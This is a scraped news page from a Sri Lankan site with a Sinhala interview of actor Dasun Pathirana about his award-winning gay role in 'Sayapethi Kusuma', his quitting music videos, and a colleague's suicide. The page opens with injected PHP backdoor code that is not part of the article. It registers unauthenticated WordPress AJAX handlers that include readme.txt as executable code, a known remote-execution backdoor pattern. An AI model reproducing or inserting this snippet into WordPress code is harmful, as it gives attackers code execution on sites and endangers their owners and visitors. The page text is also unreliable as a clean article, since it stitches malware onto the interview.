if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ආයේ කිසිම දවසක මියුසික් වීඩියෝවල රඟපාන්නේ නැහැ - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

ආයේ කිසිම දවසක මියුසික් වීඩියෝවල රඟපාන්නේ නැහැ

දසුන් පතිරණ කියන්නේ දක්ෂ රංගන ශිල්පියෙකු බව ඔහු ඔප්පු කරලා පෙන්නුවේ රංගනයට පිවිසිලා ඉතාමත් කෙටි කාලයක් තුළදියි. වේදිකාව, පුංචි තිරය වගේම සිනමාවේත් විවිධාකාර චරිත නිරූපණය කළ දසුන් පහුගියදා පැවැති දෙරණ සිනමා සම්මාන උළෙ‍ලේදී “හොඳම නළුවා” ලෙසත් සම්මානයට පාත්‍ර වුණා. “සයපෙති කුසුම’ චිත්‍රපටයේ කළ ආන්දෝලනාත්මක රංගනය උදෙසායි දසුන්ට මෙම සම්මානය හිමි වුණේ.
හොඳ රංගනයක් කරන විට සම්මාන සහ ඇගයීම් ගැන ඕනෑම නළුවෙකුට බලා‍පොරොත්තු ඇති වෙනවා “සයපෙති කුසුම” රඟපාන කාලෙදි දසුන්ටත් ඒ විදිහේ බලා‍පොරොත්තුවක් තිබුණාද?
සම්මානයක් බලාගෙන නම් මම කවදාවත් රඟපාන්නේ නැහැ. ‘‘සයපෙති කුසුම’’ රූගත කරන කා‍ලේ මට තිබුණු ලොකුම ප්‍රශ්නය වුණේ සමලිංගික චරිතයක් රඟපෑම මගේ ජීවිතයට ප්‍රශ්නයක් වෙයිද? මම රඟපෑ චරිතයට සාධාරණයක් ඉටු වෙයිද? කියන ප්‍රශ්න නමෛයි. මේ චිත්‍රපටය පෙන්වා ගන්න පුළුවන් වෙයිද? කියන එකයි.
”සයපෙති කුසුම” සමලිංගික තේමාවක් රැගත් චිත්‍රපටයක්. ඔබට එහිදී තවත් සහෝදර නළුවෙකු සමග දෙතොල් සිප ගැනීමට පවා සිදුවනවා. මේ වගේ චරිතයක් භාරගනිද්දී හිතට චකිතයක් ඇති වුණේ නැද්ද?
මට කිසිම චකිතයක් ඇති වුණේ නැහැ. මොකද මට චරිතයක් කියන්නේ චරිතයක්ම විතරයි.
නළුවෙකු විදියට මගේ කාර්යය තමයි තමන් බාරගන්නා චරිතයකට උපරිම සාධාරණයක් ඉටු කිරීම.
ඒ කියන්නේ ඉදිරි කාලයේදී ඔයිටත් වඩා ආන්දෝලනාත්මක රංගනයක යෙදෙන්න වුණත් ඔබ සූදානම්ද?
අනිවාර්යයෙන්ම. හැබැයි ඉතින් මම ඒ වගේ කැප කිරීමක් කරන්නේ හොඳ නිර්මාණයක් වෙනුවෙන් විතරයි.
දසුන් ගීත රූප රචනා සඳහාත් රංගනයෙන් දායක වන නළුවෙක්. ඒ ගීත රූප රචනා සියල්ල උසස් ගණයේ ගීත වෙනුවෙන් කළ කලාත්මක රූප රචනා කියලද දසුන් කියන්නේ?
නැහැ. ඒත් මේ දේ කිව යුතුයි. මම 2004 ඉඳලා පියවරෙන් පියවර මේ ගමන එන නළුවෙක් මම වෙනත් රැකියාවක් කරන්නේ නැහැ. ක්ෂේත්‍රය තුළ මට මගේ පැවැත්ම හදාගන්න ඕනෑවූ නිසයි මම රූප රචනා සඳහා දායක වෙන්න පටන් ගත්තේ. හැබැයි අද වන විට මම එක්තරා තීරණයකට එළැඹිලයි ඉන්නේ. ඒ තමයි මම ආයේ කිසිම දවසක මියුසික් වීඩියෝවල පෙනී ඉන්නේ නැහැ කියන එක.
ඒත් අද වන විට ගීත රූප රචනා රංගනයට ඉහළම මිලක් අය කරන නළුවන් අතර ඔබත් සිටිනවා?
ඔව්. ඒත් මුදල් මතම හැමදේම තීරණය කරන්න බැහැනේ. මෑත කාලයේ මා සහභාගි වූ සමහර රූප රචනා ඇතුළත් ගීතවල වචනවත් මට මතක නැහැ. ඒ හින්දා මම ආයේ රූප රචනාවල රඟපාන්නේ නැහැ.
ගුණාත්මක නිර්මාණයක් වෙනුවෙන් ඕනෑම කැප කිරීමක් කිරීමට හැකි වීම නළුවකු විදියට ගත හැකි විශිෂ්ට තීරණයක්. ඒත් ඒ විදිහේ කැපකිරීමක් පෞද්ගලික ජීවිතයටත් බලපානවා කියලා ඔබට හිතෙන්නේ නැද්ද?
නැහැ. එහෙම වෙන්නේ පෞද්ගලික ජීවිතයයි කලාවයි පටලවා ගත්තාම විතරයි.
”සයපෙති කුසුම” චිත්‍රපටයේ ඔබ කළ සමලිංගික චරිතය ඔබේ පෙම්වතිය සතුටින් නැරඹුවාද?
නැරඹුවා විතරක් නමෛයි මා විසින් කළ අසම්මත චරිතය බලලා මම මතෛක් කළ හොදම රඟපෑම එය බවයි ඇය මට කිව්වේ.
හොඳම නළුවා සම්මානය හිමි වීම සතුට උතුරා යන මොහොතක්. ඒත් ඒ වේදිකාව මතදී ඔබ දසුන් නිශාන්ගේ මරණය ගැන සිහිපත් කරලා සංවේදී වුණා නේද?
ඔව්. ඒ දසුන් නිශාන්. මම දසුන් පතිරණ. මේ දස්සා සම්මාන ගනිද්දී ඒ දස්සා ජීවතුන් අතර හිටියා නම් හදවතින්ම සතුටු වන බව මම දන්නවා. මොකද ඔහු කුහකයෙක් ‍නෙවෙයි. රත්තරං හදවතක් තිබුණු කොල්ලෙක්. කැපිලි කෙටිලි ඔහු ළඟ නැහැ. සිය දිවි හානි කරගැනීමට ඔහු ගත් තීරණය මම අනුමත කරන්නේ නැහැ. ඒ මෝඩ වැඩේ තවත් කෙනෙකුට කරන්න එපා කියලයි මම එදා හැමෝගෙන්ම ඉල්ලා හිටියේ. ඇත්තටම එදා මටත් බොහොම සංවේදී අවස්ථාවක් වුණා.

( උපුටා ගැනීම ලක්බිම පුවත් පත ඇසුරෙනි)

Related posts

කොරෝනාවෙන් මියයන මුස්ලිම් ජාතිකයන් භූමදාන කරන ගැසට්ටුව ඉක්මනින්ම එන බව ඇමති අලි සබ්රි කීවා.. මන්නාරමේ භූමියක් සූදානම්..- අබ්දුල් රාසික්

Shiran Viraj

තත්පරයක් ඉවසන්න බැරි කමින් ජීවිතය අහිමි කර ගත් හැටි – කඳානම හැඬවූ යතුරුපැදි අනතුර-VIDEO

Shiran Viraj

මෙරටින් එක් දිනයකදි හමු වු වැඩිම කොරෝනා ආසාදිතයින් සොයා ගත් ආකාරය

Shiran Viraj